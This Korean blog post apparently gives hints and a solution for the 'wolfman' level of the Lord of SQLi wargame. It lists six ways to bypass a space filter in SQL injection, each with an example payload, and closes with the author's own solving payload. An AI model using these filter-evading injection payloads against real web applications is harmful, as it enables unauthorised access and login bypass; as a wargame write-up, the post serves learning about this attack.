[LOS] – wolfman 힌트 및 풀이
힌트1. 공백을 필터링한다는 것은 알고 있을 것이다. 공백을 우회하는 방법은?
힌트2. ‘공백 필터링’ 이라는 검색만 잘하면 찾을 수 있을 것이다
풀이
이번문제는 공백을 필터링 하고 있다. 이때 우회 기법은 많다.
1. Tab : %09
– no=1%09or%09id=’admin’
2. Line Feed (\n): %0a
– no=1%0aor%0aid=’admin’
3. Carrage Return(\r) : %0d
– no=1%0dor%0did=’admin’
4. 주석 : /**/
– no=1/**/or/**/id=’admin’
5. 괄호 : ()
– no=(1)or(id=’admin’)
6. 더하기 : +
– no=1+or+id=’admin’
출처: http://binaryu.tistory.com/31 [BinaryU]
위의 6가지 방법중 하나를 사용하면 문제를 클리어 할 수 있을 것이다.
나는 %0a를 써서 다음과 같이 문제를 클리어 했다.
?pw=1’||%0aid=’admin
.
'CTF > LOS' 카테고리의 다른 글
| [LOS] – orge 힌트 및 풀이 (0) | 2019.04.06 |
|---|---|
| [LOS] – darkelf 힌트 및 풀이 (0) | 2019.04.06 |
| [LOS] – wolfman 힌트 및 풀이 (0) | 2019.04.06 |
| [LOS] – orc 힌트 및 풀이 (0) | 2019.04.06 |
| [LOS] – goblin 힌트 및 풀이 (0) | 2019.04.06 |
| [LOS] – cobolt 힌트 및 풀이 (0) | 2019.04.06 |